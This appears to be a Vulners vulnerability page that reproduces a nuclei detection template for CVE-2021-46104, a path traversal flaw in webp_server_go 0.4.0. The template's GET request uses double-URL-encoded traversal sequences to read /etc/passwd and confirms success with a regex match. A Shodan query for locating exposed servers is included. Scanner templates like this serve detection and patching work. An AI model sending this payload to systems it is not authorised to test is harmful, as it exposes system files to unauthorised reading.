Lucene search
+L

webp_server_go 0.4.0 - Path Traversal

🗓️ 29 Jul 2026 05:02:25Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

webp_server_go 0.4.0 path traversal flaw allows reading arbitrary server files via crafted GET requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-46104
19 Jan 202213:15
attackerkb
circl
Circl
CVE-2021-46104
19 Jan 202216:25
circl
cnnvd
CNNVD
Webp_Server_Go 路径遍历漏洞
19 Jan 202200:00
cnnvd
cve
CVE
CVE-2021-46104
19 Jan 202212:26
cve
cvelist
Cvelist
CVE-2021-46104
19 Jan 202212:26
cvelist
euvd
EUVD
EUVD-2021-32804
3 Oct 202520:07
euvd
nvd
NVD
CVE-2021-46104
19 Jan 202213:15
nvd
prion
Prion
Directory traversal
19 Jan 202213:15
prion
veracode
Veracode
Directory Traversal
20 Jan 202205:16
veracode
id: CVE-2021-46104

info:
  name: webp_server_go 0.4.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: |
    webp_server_go 0.4.0 contains a path traversal caused by insufficient sanitization in file handling, letting attackers read arbitrary files on the server, exploit requires attacker to send crafted requests.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server including /etc/passwd via path traversal using double URL encoding.
  remediation: |
    Upgrade to webp_server_go version 0.4.1 or later that properly sanitizes file paths.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46104
    cwe-id: CWE-22
    epss-score: 0.04231
    epss-percentile: 0.89984
    cpe: cpe:2.3:a:webp:webp_server_go:0.4.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webp
    product: webp_server_go
    shodan-query: http.html:"Webp"
  tags: cve,cve2021,lfi,webp,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205deb09674ba3d42a4f0826ff893a8b7f70977737c92c81cbe8a674a8c529e415022100c8ba30eb145bb7f0f8b3b1e117ead3cfa9e7223dd0fbe7689d803d3dc0e18ccb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.04231
34